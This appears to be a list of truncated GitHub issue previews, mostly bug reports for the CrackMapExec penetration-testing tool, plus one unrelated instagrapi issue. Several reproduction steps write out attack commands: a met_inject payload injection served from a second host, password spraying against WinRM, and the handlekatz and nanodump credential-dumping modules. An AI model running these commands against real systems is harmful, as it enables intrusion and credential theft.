-
## Steps to reproduce
1. ...
2. ...
## Command string used
crackmapexec smb 192.168.203.131 -u administrator -p "123" -M met_inject -o SRVHOST=192.168.203.129 SRVPORT=8777 RAND=tQVZLO5RhaPEii7…
-
## Steps to reproduce
1. use crackmapexec for winrm
2.
## Command string used
└─$ crackmapexec -t 36 winrm 10.129.202.136 -u 'john' -p ./Password-Attacks/password.list
## CME Version…
-
**Describe the bug**
CME crashes and gives a trace back error
**To Reproduce**
download current binary cme-ubuntu-latest-3.11.zip
unzip cme-ubuntu-latest-3.11.zip
python3 cme
**Expected beha…
-
**Describe the bug**
Since aarwolf 0.2.0 is required I am no longer able to install the latest cme version.
poetry install
• Installing aardwolf (0.2.0 d239c84): Building...
• Installin…
-
**Describe the bug**
CME not working with some commands
**To Reproduce**
Steps to reproduce the behavior:
run the command `cme smb -u -p -M handlekatz`
or `cme smb -u -p -M nanodump`
…
-
### Bug description
When executing CME I have an error related to python syntax
### Steps to reproduce
```
❯ /usr/bin/crackmapexec
Traceback (most recent call last):
File "/usr/bin/crack…
-
**Describe the bug**
ImportError: cannot import name 'highlight' from 'helpers'
**To Reproduce**
Steps to reproduce the behavior:
1. Clone the repo
2. cd into it
3. Install it using pipenv as …
-
user_medias function returns empty list
**Code:**
```python
from instagrapi import Client
cl = Client()
cl.login_by_sessionid("REDACTED")
media_raw=cl.user_medias(cl.user_id)
print(cl.account…
-
When I try to mark a device as owned using the module bh_owned it fails with an error message, but in bloodhound database the device is actually marked as owned.
```
crackmapexec smb 10.129.203.12…
-
**Describe the bug**
Issue with fully updated cme from source code
I have trouble with using `--use-kcache` along with the `smb` (yeah, i know about updated `-k` option and i could inetarct with ker…